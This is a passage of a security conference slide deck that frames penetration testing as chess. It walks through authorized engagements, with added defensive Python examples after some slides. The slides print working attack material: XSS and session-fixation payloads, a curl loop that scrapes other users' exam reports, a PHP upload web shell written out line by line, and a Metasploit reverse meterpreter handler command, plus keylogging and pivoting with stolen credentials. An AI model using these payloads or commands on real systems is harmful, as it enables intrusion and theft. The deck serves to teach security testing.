![Page 58: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/58.jpg)
Mental Toughness: Karpov
Karpov: World Champion 1975–85…
“.. I could resist in positions where other players probably would resign. And I was finding interesting ideas on how to defend difficult positions and I could save many games. ..I never gave up…you try to find the best move whatever the position is, because many people they say, okay, this is bad and then they lose will to fight. I never lost the will to fight.”
http://bigthink.com/videos/the-value-of-mental-toughness
![Page 59: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/59.jpg)
Efficient Chess Analysis
From Alexander Kotov - "Think like a Grandmaster":
1) Draw a list of candidate moves (3-4) → 1st Sweep (!deep)
2) Analyse each variation only once (!) → 2nd Sweep (deep)
3) After step 1 and 2 make a move
Pen tester translation:
1) Draw up a list of candidate paths of attack
2) Analyse [ tool output + other info ] once and only once
3) After 1) and 2) exploit the best path of attack
Ever analysed X in depth to only see “super-Y” later?
![Page 60: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/60.jpg)
In 5 minutes
Putting it all together:
![Page 61: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/61.jpg)
Plugin Types (-t)
At least 50% (32 out of 64) of the tests in the OWASP Testing guide can be legally* performed at least partially without permission
* Except in Spain, where visiting a page can be illegal ☺
* This is only my interpretation and not that of my employer + might not apply to your country!
![Page 62: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/62.jpg)
A Pentester “cheating try”
Offensive (Web) Testing Framework = Multi-level “cheating” tactics
![Page 63: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/63.jpg)
OWTF’s Chess-like approach
Kasparov against Deep Blue - http://www.robotikka.com
![Page 64: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/64.jpg)
Scenario 1: Summary
Pre-Engagement: No permission to test → Game prep
1) Run passive plugins → legit + no traffic to target
Sitefinity CMS found
2) Identify best path of attack:
• Sitefinity default admin password
• Public sitefinity shell upload exploits
Engagement: Permission to test → Game performance
1) Try best path of attack first
![Page 65: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/65.jpg)
Scenario 1: Demo
![Page 66: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/66.jpg)
Scenario 1: Outcome
!!1 minute after getting permission …
![Page 67: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/67.jpg)
Scenario 1: Outcome
!!5 minutes after getting permission …
![Page 68: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/68.jpg)
Scenario 2: Summary
Attack preparation (pre-engagement safe) → Game prep
1) Run semi-passive plugins → legit
Misconfigured crossdomain, fingerprint WordPress version
2) Identify best path of attack: crossdomain + phishing + WordPress plugin upload + meterpreter
3) Replicate customer environment in lab
4) Prep attack: Adapt public payloads to target
5) Test in lab
Launching the attack → Game performance
1) Tested attack works flawlessly on the first shot
2) Pivot
3) Show impact
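The “misconfigured crossdomain” finding in step 1 is something a defender can check before a tester does. The following is an added example written for this transcript, not code from the talk or from OWTF: a small audit of a Flash/Silverlight crossdomain.xml policy that flags wildcard domains, trusted suffixes, `secure="false"` and an `all` site-control setting. Both policy documents are constructed samples, not taken from any real site.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies (not taken from any real host).
WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
"""

STRICT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="cdn.example.com" secure="true"/>
  <allow-http-request-headers-from domain="cdn.example.com" headers="X-Requested-With"/>
</cross-domain-policy>
"""


def audit_crossdomain(policy_xml):
    """Return a list of findings for a crossdomain.xml policy.

    A wildcard or broad-suffix domain lets a Flash movie served from an
    attacker-controlled origin read authenticated responses from this host
    with the victim's cookies, which is the root of the Scenario 2 chain.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["not a cross-domain-policy document"]

    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        # Adobe's default for 'secure' on an HTTPS-served policy is true.
        secure = el.get("secure", "true").lower()
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin may read responses')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": whole DNS suffix trusted')
        if secure == "false":
            findings.append(
                f'allow-access-from domain="{domain}" secure="false": '
                "plain-HTTP origins trusted by an HTTPS host"
            )

    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": arbitrary headers from any origin')

    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        findings.append('site-control permitted-cross-domain-policies="all": sub-policies anywhere on the host are honoured')
    return findings


def is_safe(policy_xml):
    """True when the audit raises no finding."""
    return not audit_crossdomain(policy_xml)
```

Run it against the policy fetched from `/crossdomain.xml` (and `/clientaccesspolicy.xml` for Silverlight) as part of a deployment check; an empty result means only explicitly named HTTPS origins are trusted.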
![Page 69: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/69.jpg)
Scenario 2: Demo
![Page 70: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/70.jpg)
Scenario 3: Summary
Pre-Engagement: No permission to test → Game prep
1) Mapping the application you notice… https://target.com/reports/rwservlet/
Auth bypass vuln by design: Oracle Reports accessible without auth
2) Identify best path of attack: Use the reporting GUI ☺
Engagement: Permission to test → Game performance
1) Pwn customer on “minute 1”: Use the reporting GUI ☺
![Page 71: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/71.jpg)
Scenario 3: Impact
![Page 72: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/72.jpg)
Scenario 3: Impact
![Page 73: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/73.jpg)
Scenario 3: Vuln Examples ☺
![Page 74: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/74.jpg)
Scenario 4: Summary
Pre-Engagement: No permission to test → Game prep
1) .NET app: OMG they have a firewall ☺
2) Hmm, they also have an XML file upload!
3) Identify best path of attack: XSS via encoded field in XML file upload
<iframe onload="javascript:ALERT('OWNED')" src="http://www.google.com"></iframe>
Engagement: Permission to test → Game performance
1) Pwn customer on “minute 1”: Persistent XSS via XML upload
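The point of Scenario 4 is that encoding in the upload does not protect the page that later displays the data: the XML parser decodes the entities and the raw markup lands in the application. The following is an added example written for this transcript, not code from the talk or from the application described: the sample XML upload is constructed, the field names (`name`, `score`) are assumptions, and the two render functions show the vulnerable and the fixed output path side by side.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample upload. The <name> field carries an entity-encoded
# iframe of the same shape as the payload on the slide; XML parsing decodes
# the entities, so the application receives raw HTML in the field value.
SAMPLE_UPLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<records>
  <record>
    <name>&lt;iframe onload=&quot;javascript:ALERT('OWNED')&quot; src=&quot;http://www.google.com&quot;&gt;&lt;/iframe&gt;</name>
    <score>42</score>
  </record>
  <record>
    <name>Alice</name>
    <score>17</score>
  </record>
</records>
"""


def parse_records(xml_text):
    """Parse the upload into plain dicts.

    For untrusted XML in production use defusedxml (assumption: installed via
    pip); ElementTree is used here so the example runs on a stock interpreter.
    """
    root = ET.fromstring(xml_text)
    return [
        {"name": rec.findtext("name", default=""), "score": rec.findtext("score", default="")}
        for rec in root.findall("record")
    ]


def render_unsafe(records):
    """Vulnerable rendering: decoded field values are concatenated into HTML.

    The browser sees a live <iframe> and fires its onload handler on every
    view of the page, which is what makes the XSS persistent.
    """
    rows = "".join(f"<tr><td>{r['name']}</td><td>{r['score']}</td></tr>" for r in records)
    return f"<table>{rows}</table>"


def render_safe(records):
    """Fixed rendering: every untrusted value is HTML-escaped at output time,
    regardless of how it was encoded on the way in."""
    rows = "".join(
        f"<tr><td>{html.escape(r['name'])}</td><td>{html.escape(r['score'])}</td></tr>"
        for r in records
    )
    return f"<table>{rows}</table>"


def leaks_markup(rendered):
    """Crude check used by the test: a raw <iframe tag from field data survived."""
    return "<iframe" in rendered
```

The defence lives at the output boundary (contextual escaping in the view or template engine), not in an input filter on the upload; input validation on the XML can still reject fields that should never contain `<` at all, but it is a second layer rather than the fix.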
![Page 75: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/75.jpg)
Scenario 4: PoC
![Page 76: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/76.jpg)
Scenario 5: Summary
Pre-Engagement: No permission to test → Game prep
1) File upload check: Can upload doc files
2) Noting URL: http://target.com/attachments/..........._test.doc
3) Log out
4) Try to get uploaded file: Success → Auth bypass
5) Prepare attack: Write script to download all documents
Engagement: Permission to test → Game performance
1) Pwn customer on “minute 1”: Run script
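Scenario 5 works because the web server hands out `/attachments/` directly, so the application's login never gets a say. The following is an added example written for this transcript, not code from the talk or from the application tested: an attachment service that stores uploads under an unguessable handle and serves them only through a handler that checks both authentication and ownership. The session dictionary shape, the `attachments:read-all` role name and the in-memory store are assumptions made for the example.

```python
import os
import secrets


class AttachmentService:
    """Serve uploads through an authenticated handler instead of letting the
    web server expose an /attachments/ directory straight from disk."""

    def __init__(self):
        # token -> (owner, original filename, bytes). A real deployment keeps
        # the bytes outside the web root; in memory here to stay self-contained.
        self._store = {}

    @staticmethod
    def _safe_name(filename):
        # Keep only the final path component so a user-supplied name cannot
        # point outside the attachment area.
        name = os.path.basename(filename.replace("\\", "/"))
        if not name or name in (".", "..") or "\x00" in name:
            raise ValueError("invalid filename")
        return name

    def upload(self, session, filename, data):
        if not session or not session.get("user"):
            raise PermissionError("login required")
        name = self._safe_name(filename)
        # Unguessable handle: the URL no longer reveals or enumerates files.
        token = secrets.token_urlsafe(24)
        self._store[token] = (session["user"], name, data)
        return token

    def download(self, session, token):
        # 1) Authentication: the request must carry a live, logged-in session.
        if not session or not session.get("user"):
            raise PermissionError("login required")
        entry = self._store.get(token)
        if entry is None:
            raise FileNotFoundError(token)
        owner, name, data = entry
        # 2) Authorization: the caller owns the file or holds a read-all role.
        if owner != session["user"] and "attachments:read-all" not in session.get("roles", ()):
            raise PermissionError("not the owner")
        return name, data

    def logout(self, session):
        # Destroying the session is what makes step 3/4 of the scenario fail.
        session.clear()


def can_download(svc, session, token):
    """True when the handler serves the file, False when it refuses."""
    try:
        svc.download(session, token)
        return True
    except (PermissionError, FileNotFoundError):
        return False


def demo():
    """Replay the Scenario 5 sequence: upload, note the handle, log out, retry."""
    svc = AttachmentService()
    alice = {"user": "alice", "roles": []}
    bob = {"user": "bob", "roles": []}
    token = svc.upload(alice, "../../etc/test.doc", b"report contents")
    name, _ = svc.download(alice, token)
    results = {
        "owner": can_download(svc, alice, token),
        "other_user": can_download(svc, bob, token),
    }
    svc.logout(alice)
    results["after_logout"] = can_download(svc, alice, token)
    return name, results
```

The unguessable token is a convenience, not the control: the check that stops the “download all documents” script is the ownership test in `download`, which fails for another user and for a logged-out session even when the handle is known.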
![Page 77: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/77.jpg)
Scenario 6: Summary
1) Session ID does not change after login
2) Got XSS
3) Prepping XSS + Session fixation exploit:
https://target.com/sample.php?Code='><script>document.cookie='PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6; path=/'; window.location='https://target.com/login/';</script><br
Bottom line: Session fixation through XSS is possible
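Scenario 6 chains two defects: an XSS that can write a cookie, and a login that keeps the pre-authentication session ID. The following is an added example written for this transcript, not code from the talk or from the PHP application tested: a minimal server-side session store with the vulnerable login next to the fixed one (ID rotation on login, plus strict-mode rejection of IDs the server never issued, the behaviour PHP's `session.use_strict_mode` provides). The user table, salt and password are constructed; the PBKDF2 hashing stands in for whatever password hash the application would use.

```python
import hashlib
import hmac
import secrets


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user table (a real app would use bcrypt/Argon2 with a random
# per-user salt; a static salt is used only to keep the example deterministic).
_SALT = b"constructed-static-salt-for-demo"
USERS = {"alice": (_SALT, _hash("correct horse battery staple", _SALT))}


def check_password(user, password):
    rec = USERS.get(user)
    if rec is None:
        return False
    salt, digest = rec
    return hmac.compare_digest(_hash(password, salt), digest)


class SessionStore:
    """Server-side sessions keyed by the cookie value (think PHPSESSID)."""

    def __init__(self):
        self._sessions = {}

    def start(self):
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None}
        return sid

    def resolve(self, cookie_sid):
        """Strict mode: a cookie naming an ID the server never issued is ignored
        and a fresh session is started. A PHPSESSID value invented by the
        attacker (rather than obtained from the server) would be rejected here."""
        if cookie_sid in self._sessions:
            return cookie_sid
        return self.start()

    def user(self, sid):
        sess = self._sessions.get(sid)
        return sess["user"] if sess else None

    def login_vulnerable(self, sid, user, password):
        """Scenario 6 behaviour: the ID stays the same across login, so whoever
        planted it now holds an authenticated session."""
        if sid not in self._sessions or not check_password(user, password):
            return None
        self._sessions[sid]["user"] = user
        return sid

    def login_fixed(self, sid, user, password):
        """Rotate on privilege change: the pre-auth ID is destroyed and the
        authenticated state lives only under a new ID the attacker never saw."""
        if not check_password(user, password):
            return None
        self._sessions.pop(sid, None)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = {"user": user}
        return new_sid


def fixation_succeeds(login):
    """Simulate the attack against a given login implementation and report
    whether the attacker-known ID ends up authenticated."""
    store = SessionStore()
    planted = store.start()                 # attacker obtains a server-issued ID ...
    victim_sid = store.resolve(planted)     # ... and it lands in the victim's browser
    login(store, victim_sid, "alice", "correct horse battery staple")
    return store.user(planted) == "alice"
```

Strict mode alone does not close the hole (the attacker can always fetch a valid ID from the server first, as the simulation does); regenerating the ID at login is the control, and the XSS is a separate finding to fix on its own.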
![Page 78: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/78.jpg)
Scenario 7: Summary
1) Site A makes a request to Site B with NO security tokens
2) Site A retrieves sensitive info from Site B using 1)
3) Problem verification:
curl --referer 'https://target.com/demo.php' 'http://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx' | lynx --dump -stdin | more
Quick Exploit: → Downloads arbitrary exam reports..
for i in $(php -r 'echo implode(" ",range(11200,16000));'); do
  echo "Trying $i .."
  curl … > tmp.html
  BAD=$(grep '500 - Internal server error' tmp.html | wc -l)
  if [ $BAD -eq 0 ]; then
    cp tmp.html $i.html # Got a hit
  fi
done
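The loop above leaves a very recognisable footprint on Site B: one client walking consecutive `examid` values, most of them answered with a 500. The following is an added example written for this transcript, not code from the talk: detection logic that parses combined-format access log lines, groups them per client, and flags clients whose requests form a long sequential ID run with a high server-error rate. The log lines are constructed for the example (the `/demo.jsp` path and parameter names follow the slide; the IPs, timestamps and user agents are invented).

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/Tomcat combined-log style line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def _line(ip, examid, status, agent):
    # Helper that builds one constructed log line.
    return (f'{ip} - - [24/Apr/2013:10:00:{examid % 60:02d} +0100] '
            f'"GET /demo.jsp?userid=1001&examid={examid} HTTP/1.1" {status} 512 '
            f'"https://target.com/demo.php" "{agent}"')


# Constructed sample log: one client walks examid 11200.. with mostly 500s
# (ids that do not exist); two ordinary users fetch their own reports.
SAMPLE_LOG = [_line("10.0.0.5", i, 200 if i in (11203, 11207) else 500, "curl/7.29.0")
              for i in range(11200, 11212)]
SAMPLE_LOG += [
    _line("10.0.0.9", 11203, 200, "Mozilla/5.0"),
    _line("10.0.0.9", 11203, 200, "Mozilla/5.0"),
    _line("10.0.0.12", 11207, 200, "Mozilla/5.0"),
]


def parse_line(line):
    """Return a dict with ip, status (int) and examid (int or None), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    q = parse_qs(urlsplit(rec["path"]).query)
    examid = q.get("examid", [""])[0]
    rec["examid"] = int(examid) if examid.isdigit() else None
    rec["status"] = int(rec["status"])
    return rec


def longest_sequential_run(ids, max_gap=1):
    """Length of the longest run of distinct ids whose neighbours differ by at most max_gap."""
    ids = sorted(set(ids))
    best = run = 1 if ids else 0
    for a, b in zip(ids, ids[1:]):
        run = run + 1 if b - a <= max_gap else 1
        best = max(best, run)
    return best


def find_enumeration(lines, min_run=5, min_error_rate=0.5):
    """Flag clients that request many consecutive examid values with a high
    error rate: the footprint of a brute-force loop that relies on the server
    answering 500 for ids that do not exist."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["examid"] is not None:
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        run = longest_sequential_run(r["examid"] for r in recs)
        error_rate = sum(r["status"] >= 500 for r in recs) / len(recs)
        if run >= min_run and error_rate >= min_error_rate:
            flagged[ip] = {"requests": len(recs), "sequential_run": run,
                           "error_rate": round(error_rate, 2)}
    return flagged
```

Detection is the fallback; the fix is an authorization check on Site B that ties `examid` to the authenticated user, so a request for someone else's report gets a 403 whether or not it carries a plausible Referer (which curl sets freely, as the verification step shows). Answering 500 for a non-existent ID is a separate information leak that should become a uniform 403/404.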
![Page 79: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/79.jpg)
Scenario 8: AppSec2NetSec
1) Initial scope: 1 app server on cloud provider
2) File Upload vuln
3) Getting a nice shell
4) Run keylogger
5) Mapped hosts
6) Reused passwords
7) Pwned 17 servers (GUI access on 16)
8) No admin detected the attack ☺
![Page 80: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/80.jpg)
Scenario 8: AppSec2NetSec
2) Classic File upload, Null character and shell
Small gotcha: Image had to be valid so I used a GIF file with PHP code in the comment (using GIMP)
![Page 81: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/81.jpg)
Scenario 8: AppSec2NetSec
3) Shell is only the beginning, you know? ☺
On Windows, by default (i.e. next / next / finish install) Apache runs as SYSTEM, i.e. more than Admin: no need to escalate ☺
![Page 82: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/82.jpg)
Scenario 8: AppSec2NetSec
3) Getting comfortable (no tftp, etc.)
Creating a file upload PHP shell from a DOS shell.. NOTE: “^” is an escape character in Windows
echo ^<?php > file_upload.php
echo if (isset($_POST['Action']) ^&^& $_POST['Action'] == 'go') { >> file_upload.php
echo if (@move_uploaded_file($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']) == false) { >> file_upload.php
echo die('Error when uploading: '.$_FILES['MyFile']['error']); >> file_upload.php
echo } >> file_upload.php
echo else { >> file_upload.php
echo echo 'upload ok!'; >> file_upload.php
echo } >> file_upload.php
echo } >> file_upload.php
echo ?^> >> file_upload.php
echo ^<html^>^<form action="" enctype="multipart/form-data" name="myform" id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^>^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255" /^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >> file_upload.php
![Page 83: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/83.jpg)
Scenario 8: AppSec2NetSec
3) Now we’re ready to upload a reverse meterpreter shell ☺
![Page 84: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/84.jpg)
Scenario 8: AppSec2NetSec
Check before meterpreter upload: AV fingerprint via ‘tasklist’
![Page 85: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/85.jpg)
Scenario 8: AppSec2NetSec
You are totally blocking port 80 outbound, huh? ☺
# /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127 LPORT=80 E
…
![Page 86: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/86.jpg)
Scenario 8: AppSec2NetSec
LM hashes were disabled, NTLM hashes were tough to crack.. Time to improvise
![Page 87: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/87.jpg)
Scenario 8: AppSec2NetSec
Map network with arp -a, etc. via winenum → winenum is very scary…
![Page 88: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/88.jpg)
Scenario 8: AppSec2NetSec
Getting GUI access:
![Page 89: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/89.jpg)
Scenario 8: AppSec2NetSec
No need to crack our own password ☺
![Page 90: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/90.jpg)
Scenario 8: AppSec2NetSec
If you can’t crack passwords you might be able to steal them..
Patience is worth its prize…
![Page 91: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/91.jpg)
Scenario 8: AppSec2NetSec
While you are waiting, you might as well dump memory..
![Page 92: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/92.jpg)
Scenario 8: AppSec2NetSec
Pivoting around using stolen passwords..
![Page 93: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/93.jpg)
Scenario 8: AppSec2NetSec
Pivoting.. Where? ☺ → Approach 1) Run History
![Page 94: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/94.jpg)
Scenario 8: AppSec2NetSec
Approach 2) Merge winenum info
PASSIVE Ping Sweep: Unique IPs & MACs from the ARP table of all popped boxes via winenum
![Page 95: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/95.jpg)
Scenario 8: AppSec2NetSec
PASSIVE Local “Port scanning” from winenum
![Page 96: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/96.jpg)
Scenario 8: AppSec2NetSec
Don’t forget about IPv6 & UDP ☺
![Page 97: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/97.jpg)
Scenario 8: AppSec2NetSec
PASSIVE Remote “Port scanning” from winenum via active connections
![Page 98: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/98.jpg)
Scenario 8: AppSec2NetSec
Admin shares (c$, d$, etc), SSL private keys, ..
![Page 99: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/99.jpg)
Scenario 8: AppSec2NetSec
So you have hard-coded credentials in your scripts?
![Page 100: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/100.jpg)
Scenario 8: AppSec2NetSec
Let’s try those …
![Page 101: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/101.jpg)
Scenario 8: AppSec2NetSec
Trying…
![Page 102: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/102.jpg)
Scenario 8: AppSec2NetSec
Seeing the shares thanks to your script credentials:
![Page 103: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/103.jpg)
Scenario 8: AppSec2NetSec
Does your application store user credentials in clear-text in the user session files?
![Page 104: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/104.jpg)
Scenario 8: AppSec2NetSec
Yup ☺
![Page 105: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/105.jpg)
Scenario 8: AppSec2NetSec
And my personal favourite (only had to click OK ☺):
![Page 106: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/106.jpg)
Conclusion
3 Strength Factors:
1) Individual Skill
• Skill > Intelligence + Talent (Hard work beats talent)
• Hack your subconscious (!mental barriers)
• Don’t stop: Eat it, breathe it, sleep it
2) Game preparation
• Prep ahead: Recon + analysis + plan
• Scope like a pro: Negotiate scope, extensions, etc.
3) Game performance
• 1st Sweep: Shallow + wide analysis first
• 2nd Sweep: Deep + narrow analysis of best options
• Analyse only once
• Don’t lose the will to fight + Take the hit
![Page 107: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/107.jpg)
Thanks to Brucon 5by5
Brucon 5by5 sponsorship of OWASP OWTF
http://blog.brucon.org/2013/02/the-5by5-race-is-on.html
![Page 108: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/108.jpg)
Thanks to OWASP GSoC 2013
Google Student sponsorship of OWASP OWTF
https://www.owasp.org/index.php/GSoC
Student Proposals: April 22nd - May 3rd 2013 → Still on time!
![Page 109: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/109.jpg)
Special thanks to
OWASP Testing Guide contributors
Finux Tech Weekly – Episode 17 – mins 31-49: http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3
Finux Tech Weekly – Episode 12 – mins 33-38: http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3
Exotic Liability – Episode 83 – mins 49-53: http://exoticliability.libsyn.com/exotic-liability-83-oh-yeah
Eurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32
Adi Mutu (@an_animal), Andrés Riancho (@w3af), Bharadwaj Machiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz (@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz (@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl (@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci (@sandrogauci)
![Page 110: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/110.jpg)
Q&A
Abraham Aranguren
@7a_ @owtfp
[email protected]
http://7-a.org
http://owtf.org
Project Site (links to everything): http://owtf.org
